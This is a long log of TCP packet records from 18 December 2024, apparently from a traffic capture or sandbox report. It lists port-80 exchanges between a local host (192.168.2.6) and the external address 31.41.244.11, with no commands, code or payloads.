                                                                                                                                                              Dec 18, 2024 11:47:36.742031097 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.742043018 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.742082119 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.742844105 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.742897987 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.742969990 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.743046045 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.744132042 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.744143963 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.744231939 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.745146036 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.745193005 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.745233059 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.745271921 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.746328115 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.746375084 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.746510983 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.746566057 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.747476101 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.747524977 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.747565985 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.747606039 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.748614073 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.748660088 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.748771906 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.748816013 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.749833107 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.749852896 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.749878883 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.749890089 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.750993013 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.751044989 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.751106024 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.751142979 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.752120972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.752186060 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.752202034 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.752295017 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.753258944 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.753324032 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.753417969 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.753462076 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.754590034 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.754601955 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.754657984 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.756941080 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.756953955 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.757036924 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.757884979 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.757976055 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.758043051 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.760997057 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.761087894 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.761123896 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.761162043 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.761486053 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.761499882 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.761558056 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.762257099 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.762310982 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.762386084 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.762496948 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.763778925 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.763794899 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.763853073 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.764950037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.764964104 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.765012026 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.765819073 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.765830994 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.765877008 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.766927958 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.766993046 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.767055988 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.767704964 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.767759085 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.767868042 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.768044949 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.768661976 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.768866062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.768927097 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.769655943 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.769714117 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.769846916 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.769900084 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.771012068 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.771039963 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.771064043 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.771075010 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.772090912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.772105932 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.772160053 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.772640944 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.772751093 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.772795916 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.772809982 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.773830891 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.776832104 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.901618004 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.901659012 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.901712894 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.901753902 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.901791096 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.901849985 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.901859999 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.901904106 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.905061007 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.905118942 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.905184984 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.905245066 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.905698061 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.905711889 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.905724049 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.905735970 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.905751944 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.905785084 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.906486988 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.906536102 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.906622887 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.906668901 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.907675028 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.907691002 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.907726049 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.908641100 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.908655882 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.908694029 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.908705950 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.909792900 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.909809113 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.909847021 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.910656929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.910820961 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.911777973 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.911854982 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.911928892 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.912369967 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.912939072 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.912955046 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.912982941 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.912996054 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.913911104 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.913961887 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.914108038 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.914154053 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.914971113 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.915019989 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.915138960 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.915184021 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.915972948 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.916045904 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.916136980 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.916188002 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.917052031 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.917098045 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.917211056 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.917265892 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.918253899 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.918272018 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.918303967 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.918314934 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.919389009 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.919406891 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.919445038 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.919457912 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.920377970 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.920392990 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.920420885 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.920432091 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.921554089 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.921566963 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.921596050 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.921623945 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.922519922 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.922533989 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.922568083 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.923429012 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.923479080 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.923592091 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.923631907 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.924588919 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.924633980 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.924743891 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.924784899 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.925684929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.925697088 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.925734043 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.926695108 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.926738977 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.926851988 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.926889896 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.927747965 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.927792072 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.927967072 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.928009033 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.928847075 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.928891897 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.928997040 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.929034948 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.930018902 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.930032969 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.930066109 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.930087090 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.930986881 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.931031942 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.931123018 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.931163073 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.932173014 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.932185888 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.932239056 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.933146954 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.933192968 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.933334112 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.933376074 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.934366941 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.934412956 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.934541941 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.934581995 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.935391903 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.935432911 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.935523033 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.935560942 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.936213017 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.936258078 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.936407089 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.936454058 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.937326908 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.937372923 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.937495947 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.937536001 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.938536882 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.938549995 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.938579082 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.938599110 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.939049006 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.939091921 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.939300060 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.939340115 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.940150023 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.940196037 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.940278053 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.940315008 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.942949057 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.942967892 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.943003893 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.943422079 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.943434954 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.943464041 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.943484068 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.943748951 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.943789959 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.943932056 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.944014072 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.944756985 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.944797039 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.944960117 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.944997072 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.945930958 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.946093082 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.946139097 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.947118998 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.947134018 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.948098898 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.948163986 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.948227882 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.949054956 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.949098110 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.949212074 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.950037003 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.950082064 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.950197935 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.950234890 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.951220989 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.951323986 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.951373100 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.951417923 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.952256918 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.952315092 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.952440023 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.952526093 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.953260899 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.953322887 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.953448057 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.953494072 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.954278946 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.954329967 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.954432011 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.955456018 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.955512047 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.955590010 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.956552029 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.956562996 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.956599951 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.957595110 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.958257914 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:37.092731953 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:37.092837095 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:37.092915058 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:37.093187094 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:37.093468904 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:37.093523026 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:37.094341040 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:37.094504118 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:37.094547033 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:37.095288992 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:37.095334053 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:37.095336914 CET804985931.41.244.11192.168.2.6
